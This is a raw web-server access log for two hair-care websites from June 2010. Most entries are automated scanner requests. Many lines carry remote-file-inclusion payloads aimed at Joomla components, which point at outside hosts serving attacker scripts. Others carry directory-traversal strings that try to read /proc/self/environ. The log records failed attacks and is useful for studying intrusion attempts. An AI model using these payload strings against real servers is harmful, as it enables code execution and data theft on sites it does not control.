93.186.192.124 - - [28/Jun/2010:06:27:22 -0700] "GET /logs/access_100412.log%20%20//skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:06:27:26 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:06:27:52 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [28/Jun/2010:06:29:16 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
97.65.18.158 - - [28/Jun/2010:06:29:40 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
97.65.18.158 - - [28/Jun/2010:06:29:41 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
97.65.18.158 - - [28/Jun/2010:06:29:41 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
69.175.39.90 - - [28/Jun/2010:06:31:58 -0700] "GET /index.php?option=com_gcalendar&controller=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
97.65.18.158 - - [28/Jun/2010:06:34:16 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
97.65.18.158 - - [28/Jun/2010:06:34:16 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
97.65.18.158 - - [28/Jun/2010:06:34:16 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
69.175.39.90 - - [28/Jun/2010:06:36:50 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.175.39.90 - - [28/Jun/2010:06:36:50 -0700] "GET /index.php?option=com_gcalendar&controller=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.175.39.90 - - [28/Jun/2010:06:36:50 -0700] "GET /logs/index.php?option=com_gcalendar&controller=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
97.65.18.158 - - [28/Jun/2010:06:39:27 -0700] "GET /logs/access_100621.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
112.104.57.22 - - [28/Jun/2010:06:39:50 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
112.104.57.22 - - [28/Jun/2010:06:39:51 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
112.104.57.22 - - [28/Jun/2010:06:39:52 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
112.104.57.22 - - [28/Jun/2010:06:40:40 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
112.104.57.22 - - [28/Jun/2010:06:40:41 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
112.104.57.22 - - [28/Jun/2010:06:40:41 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
89.108.64.192 - - [28/Jun/2010:06:46:34 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
193.178.146.58 - - [28/Jun/2010:06:47:13 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
193.178.146.58 - - [28/Jun/2010:06:47:13 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
193.178.146.58 - - [28/Jun/2010:06:47:14 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
193.178.146.58 - - [28/Jun/2010:06:47:48 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
193.178.146.58 - - [28/Jun/2010:06:47:49 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
112.104.57.22 - - [28/Jun/2010:06:47:52 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
112.104.57.22 - - [28/Jun/2010:06:47:52 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
112.104.57.22 - - [28/Jun/2010:06:47:53 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
112.104.57.22 - - [28/Jun/2010:06:47:53 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
112.104.57.22 - - [28/Jun/2010:06:47:54 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
112.104.57.22 - - [28/Jun/2010:06:47:54 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:06:48:21 -0700] "GET /logs/access_091102.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:06:48:22 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:06:48:22 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
91.212.226.240 - - [28/Jun/2010:06:51:31 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "growlonghairfast.com"
91.212.226.240 - - [28/Jun/2010:06:51:31 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "growlonghairfast.com"
112.104.57.22 - - [28/Jun/2010:06:52:04 -0700] "GET /logs/access_100621.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
112.104.57.22 - - [28/Jun/2010:06:52:04 -0700] "GET /logs/access_100621.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
193.178.146.58 - - [28/Jun/2010:06:56:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
193.178.146.58 - - [28/Jun/2010:06:56:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
74.52.48.66 - - [28/Jun/2010:06:59:24 -0700] "GET /logs/access_100531.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.52.48.66 - - [28/Jun/2010:06:59:24 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.52.48.66 - - [28/Jun/2010:06:59:24 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.52.48.66 - - [28/Jun/2010:06:59:24 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.52.48.66 - - [28/Jun/2010:06:59:24 -0700] "GET /logs/access_100531.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.52.48.66 - - [28/Jun/2010:06:59:24 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.52.48.66 - - [28/Jun/2010:07:01:05 -0700] "GET /logs/access_100412.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.52.48.66 - - [28/Jun/2010:07:01:20 -0700] "GET /logs/access_100412.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.240 - - [28/Jun/2010:07:02:12 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Opera/9.00 (Windows NT 5.1; U; ru)" "freehairsecrets.com"
91.212.226.240 - - [28/Jun/2010:07:02:13 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Opera/9.00 (Windows NT 5.1; U; ru)" "freehairsecrets.com"
66.191.139.210 - - [28/Jun/2010:07:09:08 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [28/Jun/2010:07:09:08 -0700] "GET /logs/access_100104.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [28/Jun/2010:07:09:08 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [28/Jun/2010:07:10:25 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [28/Jun/2010:07:10:25 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [28/Jun/2010:07:10:25 -0700] "GET /logs/access_100104.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:07:10:55 -0700] "GET /logs/access_091228.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:07:10:55 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:07:10:56 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:07:13:36 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
118.170.196.196 - - [28/Jun/2010:07:14:47 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 917504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
121.254.172.27 - - [28/Jun/2010:07:15:41 -0700] "GET /index.php?option=com_search&sstring=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.172.27 - - [28/Jun/2010:07:15:41 -0700] "GET /logs//index.php?option=com_search&sstring=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.172.27 - - [28/Jun/2010:07:15:41 -0700] "GET /logs/access_100614.log%20%20//index.php?option=com_search&sstring=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.32.91.251 - - [28/Jun/2010:07:16:41 -0700] "GET /logs//modules/errors.php?error=http://ph.adroo.com/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "growlonghairfast.com"
72.32.91.251 - - [28/Jun/2010:07:16:41 -0700] "GET /modules/errors.php?error=http://ph.adroo.com/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "growlonghairfast.com"
121.254.172.27 - - [28/Jun/2010:07:16:45 -0700] "GET /logs/access_100208.log%20%20//index.php?option=com_search&sstring=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.108.64.192 - - [28/Jun/2010:07:17:53 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
66.129.109.12 - - [28/Jun/2010:07:18:48 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
66.129.109.12 - - [28/Jun/2010:07:18:48 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
202.29.86.7 - - [28/Jun/2010:07:20:57 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.29.86.7 - - [28/Jun/2010:07:20:57 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.29.86.7 - - [28/Jun/2010:07:20:57 -0700] "GET /logs/access_100531.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.29.86.7 - - [28/Jun/2010:07:21:07 -0700] "GET /logs/access_100510.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
187.45.193.159 - - [28/Jun/2010:07:23:47 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.143 - - [28/Jun/2010:07:23:47 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.150.220.231 - - [28/Jun/2010:07:23:59 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "growlonghairfast.com"
66.129.109.12 - - [28/Jun/2010:07:25:14 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
66.129.109.12 - - [28/Jun/2010:07:25:14 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
66.129.109.12 - - [28/Jun/2010:07:25:14 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
187.45.193.143 - - [28/Jun/2010:07:25:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [28/Jun/2010:07:25:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
66.129.109.12 - - [28/Jun/2010:07:26:24 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
66.129.109.12 - - [28/Jun/2010:07:26:24 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
66.129.109.12 - - [28/Jun/2010:07:26:25 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
216.180.240.110 - - [28/Jun/2010:07:28:48 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.180.240.110 - - [28/Jun/2010:07:28:48 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.180.240.110 - - [28/Jun/2010:07:28:48 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
187.45.193.143 - - [28/Jun/2010:07:30:10 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.143 - - [28/Jun/2010:07:30:10 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.143 - - [28/Jun/2010:07:30:11 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.159 - - [28/Jun/2010:07:30:12 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.159 - - [28/Jun/2010:07:30:12 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.159 - - [28/Jun/2010:07:30:13 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.94.177.94 - - [28/Jun/2010:07:31:27 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.94.177.94 - - [28/Jun/2010:07:31:27 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.94.177.94 - - [28/Jun/2010:07:31:27 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.94.177.94 - - [28/Jun/2010:07:31:40 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.94.177.94 - - [28/Jun/2010:07:31:40 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.94.177.94 - - [28/Jun/2010:07:31:40 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:07:32:07 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:07:32:07 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
67.205.67.73 - - [28/Jun/2010:07:32:28 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:07:32:28 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:32:41 -0700] "GET /logs/access_100531.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:32:41 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:32:41 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:33:01 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
